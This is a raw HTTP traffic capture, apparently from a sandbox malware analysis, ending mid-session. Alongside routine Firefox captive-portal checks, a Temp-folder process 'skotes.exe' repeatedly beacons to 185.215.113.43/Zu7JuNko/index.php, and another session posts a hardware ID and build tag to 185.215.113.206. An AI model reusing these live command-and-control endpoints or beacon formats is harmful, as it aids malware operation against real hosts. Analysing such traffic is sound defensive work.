Dec 13, 2024 18:58:39.060282946 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:58:39.375437021 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27805 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:58:40.290214062 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:58:40.604931116 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27806 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:58:41.520102024 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:58:41.835383892 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27807 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 19:00:19.830302954 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 19:00:20.146380901 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27905 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 19:00:40.091345072 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 19:00:40.407008886 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27926 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	50108	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:16.014200926 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:55:17.361768961 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	50125	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:20.647175074 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:55:22.068249941 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	50132	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:23.708307981 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:55:25.047370911 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.7	50134	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:26.304018974 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:55:27.645698071 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:55:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 13, 2024 18:55:27.649027109 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJJDGHCBGDHIECBGIDA Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 33 37 30 30 39 37 31 45 35 38 41 33 37 38 38 39 35 32 38 38 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 2d 2d 0d 0a Data Ascii: ------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="hwid"83700971E58A3788952882------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="build"stok------GHJJDGHCBGDHIECBGIDA--
Dec 13, 2024 18:55:28.094191074 CET	210	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:55:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	50136	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:26.791110039 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	50138	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:28.626754999 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:55:29.987581968 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	50141	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:31.726543903 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:55:33.068150043 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.7	50144	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:34.705162048 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:55:36.063087940 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	50145	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:37.883270025 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:55:39.215581894 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	50148	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:40.847781897 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:55:42.199517012 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	50159	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:43.948904991 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:55:45.290431976 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	50162	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:46.929277897 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:55:48.307636023 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	50164	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:50.056205034 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:55:51.389588118 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	50165	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:53.025558949 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:55:54.393011093 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	50168	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:56.150707006 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:55:57.498265982 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	50169	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:59.126717091 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:56:00.472206116 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	50170	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:02.210166931 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:56:03.541729927 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.7	50171	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:05.168710947 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:56:06.548341036 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.7	50172	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
